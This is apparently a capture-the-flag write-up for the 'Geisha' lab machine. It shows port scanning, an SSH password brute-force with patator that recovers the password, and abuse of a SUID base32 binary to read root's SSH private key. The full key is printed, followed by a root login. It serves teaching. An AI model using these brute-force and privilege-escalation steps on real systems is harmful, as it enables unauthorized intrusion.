Geisha - OSPG
Read this in "about 3 minutes".
Summary
We’ll obtain the initial access by brute-force SSH password of the user geisha. Privilege escalation can be done via a misconfigured SUID binary base32, which we’ll abuse to expose root SSH private key and fully compromise root access.
Enumeration
Let us begin with a nmap scan.
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Geisha
7080/tcp open ssl/empowerid syn-ack ttl 63 LiteSpeed
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: LiteSpeed
|_http-title: Did not follow redirect to https://192.168.199.82:7080/
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US/X509v3 Subject Alternative Name=DNS.1=42.114.248.217
| Issuer: commonName=geisha/organizationName=webadmin/countryName=US/X509v3 Subject Alternative Name=DNS.1=42.114.248.217
7125/tcp open http syn-ack ttl 62 nginx 1.17.10
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.17.10
|_http-title: Geisha
8088/tcp open http syn-ack ttl 63 LiteSpeed httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: LiteSpeed
|_http-title: Geisha
9198/tcp open http syn-ack ttl 63 SimpleHTTPServer 0.6 (Python 2.7.16)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/2.7.16
|_http-title: Geisha
Conducting a few web directory scans, we discovered the /passwd file on the HTTP service port 7125, which divulged geisha user.
Exploitation
SSH Brute-force
Running patator against the server, after a few minutes, we found geisha credentials.
atator ssh_login host=192.168.199.82 user=geisha password=FILE0 0=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed.'
03:34:21 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.7 at 2021-11-15 03:34 EST
03:34:21 patator INFO -
03:34:21 patator INFO - code size time | candidate | num | mesg
03:34:21 patator INFO - -----------------------------------------------------------------------------
03:37:25 patator INFO - 0 39 0.476 | letmein | 512 | SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
^C03:39:51 patator INFO - Hits/Done/Skip/Fail/Size: 1/919/0/0/14344392, Avg: 2 r/s, Time: 0h 5m 29s
03:39:51 patator INFO - To resume execution, pass --resume 92,93,91,93,92,92,91,93,91,91
With this password, we can ssh our way in as geisha.
Privilege Escalation
Enumerate the system locally, we found a misconfigured SUID binary.
geisha@geisha:~$ find / -perm -u=s 2>/dev/null;
...
/usr/bin/base32
...
Attempting to read root SSH private key, we are able to compromise root access.
geisha@geisha:~$ LFILE=/root/.ssh/id_rsa
geisha@geisha:~$ base32 "$LFILE" | base32 --decode
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA43eVw/8oSsnOSPCSyhVEnt01fIwy1YZUpEMPQ8pPkwX5uPh4
OZXrITY3JqYSCFcgJS34/TQkKLp7iG2WGmnno/Op4GchXEdSklwoGOKNA22l7pX5
89FAL1XSEBCtzlrCrksvfX08+y7tS/I8s41w4aC1TDd5o8c1Kx5lfwl7qw0ZMlbd
5yeAUhuxuvxo/KFqiUUfpcpoBf3oT2K97/bZr059VU8T4wd5LkCzKEKmK5ebWIB6
fgIfxyhEm/o3dl1lhegTtzC6PtlhuT7ty//mqEeMuipwH3ln61fHXs72LI/vTx26
TSSmzHo8zZt+/lwrgroh0ByXbCtDaZjo4HAFfQIDAQABAoIBAQCRXy/b3wpFIcww
WW+2rvj3/q/cNU2XoQ4fHKx4yqcocz0xtbpAM0veIeQFU0VbBzOID2V9jQE+9k9U
1ZSEtQJRibwbqk1ryDlBSJxnqwIsGrtdS4Q/CpBWsCZcFgy+QMsC0RI8xPlgHpGR
Y/LfXZmy2R6E4z9eKEYWlIqRMeJTYgqsP6ZR4SOLuZS1Aq/lq/v9jqGs/SQenjRb
8zt1BoqCfOp5TtY1NoBLqaPwmDt8+rlQt1IM+2aYmxdUkLFTcMpCGMADggggtnR+
10pZkA6wM8/FlxyAFcNwt+H3xu5VKuQKdqTfh1EuO3c34UmuS1qnidHO1rYWOhYO
jceQYzoBAoGBAP/Ml6cp2OWqrheJS9Pgnvz82n+s9yM5raKNnH57j0sbEp++eG7o
2po5/vrLBcCHGqZ7+RNFXDmRBEMToru/m2RikSVYk8QHLxVZJt5iB3tcxmglGJj/
cLkGM71JqjHX/edwu2nNu14m4l1JV9LGvvHR5m6uU5cQvdcMTsRpkuxdAoGBAOOl
THxiQ6R6HkOt9w/WrKDIeGskIXj/P/79aB/2p17M6K+cy75OOYzqkDPENrxK8bub
RaTzq4Zl2pAqxvsv/CHuJU/xHs9T3Ox7A1hWqnOOk2f0KBmhQTYBs2OKqXXZotHH
xvkOgc0fqRm1QYlCK2lyBBM14O5Isud1ZZXLUOuhAoGBAIBds1z36xiV5nd5NsxE
1IQwf5XCvuK2dyQz3Gy8pNQT6eywMM+3mrv6jrJcX66WHhGd9QhurjFVTMY8fFWr
edeOfzg2kzC0SjR0YMUIfKizjf2FYCqnRXIUYrKC3R3WPlx+fg5CZ9x/tukJfUEQ
65F+vBye7uPISvw3+O8n68shAoGABXMyppOvrONjkBk9Hfr0vRCvmVkPGBd8T71/
XayJC0L6myG02wSCajY/Z43eBZoBuY0ZGL7gr2IG3oa3ptHaRnGuIQDTzQDj/CFh
zh6dDBEwxD9bKmnq5sEZq1tpfTHNrRoMUHAheWi1orDtNb0Izwh0woT6spm49sOf
v/tTH6ECgYEA/tBeKSVGm0UxGrjpQmhW/9Po62JNz6ZBaTELm3paaxqGtA+0HD0M
OuzD6TBG6zBF6jW8VLQfiQzIMEUcGa8iJXhI6bemiX6Te1PWC8NMMULhCjObMjCv
bf+qz0sVYfPb95SQb4vvFjp5XDVdAdtQov7s7XmHyJbZ48r8ISHm98s=
-----END RSA PRIVATE KEY-----
$ ssh -i id_rsa root@192.168.199.82 130 ⨯
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@geisha:~# id
uid=0(root) gid=0(root) groups=0(root)